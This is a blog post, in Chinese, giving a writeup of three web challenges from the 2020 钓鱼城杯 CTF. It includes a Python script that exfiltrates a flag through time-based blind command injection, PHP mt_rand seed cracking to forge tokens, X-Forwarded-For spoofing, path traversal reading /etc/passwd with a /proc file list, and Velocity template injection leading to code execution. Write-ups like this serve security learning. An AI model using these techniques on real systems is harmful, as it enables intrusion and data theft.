c1ay's blog

2020钓鱼城杯writeup

字数统计: 957阅读时长: 5 min
2020/08/28 Share

easyweb

php命令执行无回显、不出网、web目录不可写

通过php -r "sleep(5)"延时可以判断命令执行成功

获取/flag.txt

cmd=php -r "if(strlen(file_get_contents('/flag.txt'))==25){sleep(5);}"

mark

时间盲注脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
import time
import requests
import string
l=string.maketrans("","")[33:127]
flag=""
for i in range(26):
for j in l:
paramsPost = {"cmd":"php -r \"if(substr((file_get_contents('/flag.txt')),%d,1)=='%s'){sleep(5);}\""%(i,j)}
headers = {"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8","Cache-Control":"no-cache","Upgrade-Insecure-Requests":"1","User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:74.0) Gecko/20100101 Firefox/74.0","Connection":"close","Accept-Language":"zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2","Accept-Encoding":"gzip, deflate","Pragma":"no-cache","Content-Type":"application/x-www-form-urlencoded"}
start=time.time()
response = requests.post("http://119.3.37.185/index.php", data=paramsPost, headers=headers)
end=time.time()
if end-start >=5:
flag+=j
print flag
print flag

mark

flag{kijbvstsbsnsj1d9bc8}

easyseed

index.bak泄露key和lock生成算法

mark

1
2
3
4
5
6
7
8
9
10
11
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}

Set-Cookie里给出了lock的值

mark

根据lock值爆破seed

1
2
3
4
5
6
7
8
9
10
11
str1='abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ'
str2='vEUHaY'
str3 = str1[::-1]
length = len(str2)
res=''
for i in range(len(str2)):
for j in range(len(str1)):
if str2[i] == str1[j]:
res+=str(j)+' '+str(j)+' '+'0'+' '+str(len(str1)-1)+' '
break
print res

得到21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51

./php_mt_seed 21 21 0 51 30 30 0 51 46 46 0 51 33 33 0 51 0 0 0 51 50 50 0 51

得到两个seed

mark

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
<?php
mt_srand(718225);
//mt_srand(4007230629);
$lock = random(6, 'abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
$key = random(16, '1294567890abcdefghigklmnopqrstuvwxyzABCDEFGHIGKLMNOPQRSTUVWXYZ');
function random($length, $chars = '0123456789ABC') {
$hash = '';
$max = strlen($chars) - 1;
for($i = 0; $i < $length; $i++) {
$hash .= $chars[mt_rand(0, $max)];
}
return $hash;
}
echo $lock;
echo "\n";
echo $key;
echo "\n";

选择正确的locl、key

lock=vEUHaY; key=nRtqGR8mtd9ZOPyI;

需要带上X-Forwarded-For: 127.0.0.1请求,才能获取flag==

mark

zblog(完全是队友们做出来的)

mark

发现title存在任意文件读取

http://122.112.253.135/?title=/../../../../../../../etc/passwd

mark

尝试读取/flag、/flag.txt均不行。读取/proc/self目录下的文件

从其他师傅博客里看到的fuzz字典:

/proc/self/cmdline
/proc/self/stat
/proc/self/status
/proc/self/environ
/proc/verison
/proc/cmdline
/proc/self/cwd
/proc/self/fd/0
/proc/self/fd/1
/proc/self/fd/2
/proc/self/fd/3
/proc/self/fd/4
/proc/self/fd/5
/proc/self/fd/6
/proc/self/fd/7
/proc/self/fd/8
/proc/self/fd/9
/proc/self/fd/10
/proc/self/fd/11
/proc/self/fd/12
/proc/self/fd/13
/proc/self/fd/14
/proc/self/fd/15
/proc/self/fd/16
/proc/self/fd/17
/proc/self/fd/18
/proc/self/fd/19
/proc/self/fd/20
/proc/self/fd/21
/proc/self/fd/22
/proc/self/fd/23
/proc/self/fd/24
/proc/self/fd/25
/proc/self/fd/26
/proc/self/fd/27
/proc/self/fd/28
/proc/self/fd/29
/proc/self/fd/30
/proc/self/fd/31
/proc/self/fd/32
/proc/self/fd/33
/proc/self/fd/34
/proc/self/fd/35
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/net/fib_trie
/proc/version

在/proc/self/cmdline发现当前运行的web jar包

mark

/home/ctf/web/target/web-1.0-SNAPSHOT-jar-with-dependencies.jar

但是下载不下来

后来发现了关键的源码

/home/ctf/web/src/main/java/Blog.java

mark

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
import static spark.Spark.*;
import java.io.*;
import org.apache.velocity.Template;
import org.apache.velocity.VelocityContext;
import org.apache.velocity.app.VelocityEngine;
import spark.template.velocity.VelocityTemplateEngine;
import java.io.StringWriter;
public class Blog {
private static void log(String fname, String content) {
try {
FileWriter writer = new FileWriter(fname, true);
writer.write(content);
writer.close();
} catch (IOException e) {
}
}
public static void main(String[] arg) {
staticFiles.location("/public");
VelocityEngine velocityEngine = new VelocityEngine();
velocityEngine.setProperty(VelocityEngine.RESOURCE_LOADER, "file");
velocityEngine.setProperty(VelocityEngine.FILE_RESOURCE_LOADER_PATH, "/");
velocityEngine.init();
VelocityContext context = new VelocityContext();
get("/", (request, response) -> {
request.session(true);
String title = request.queryParams("title");
if (title != null) {
log("/tmp/" + request.session().id(), "Client IP: " + request.ip() + " -> File: " + title + "\n");
Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/" + title);
StringWriter sw = new StringWriter();
template.merge(context, sw);
return sw;
}
Template template = velocityEngine.getTemplate("/home/ctf/web/src/main/resources/templates/index");
StringWriter sw = new StringWriter();
template.merge(context, sw);
return sw;
});
}
}

X-Forwarded-For头的位置存在ssti

mark

可以直接rce,直接用solr那个rce payload就可以成功

mark

获取flag

mark

CATALOG
  1. 1. easyweb
  2. 2. easyseed
  3. 3. zblog(完全是队友们做出来的)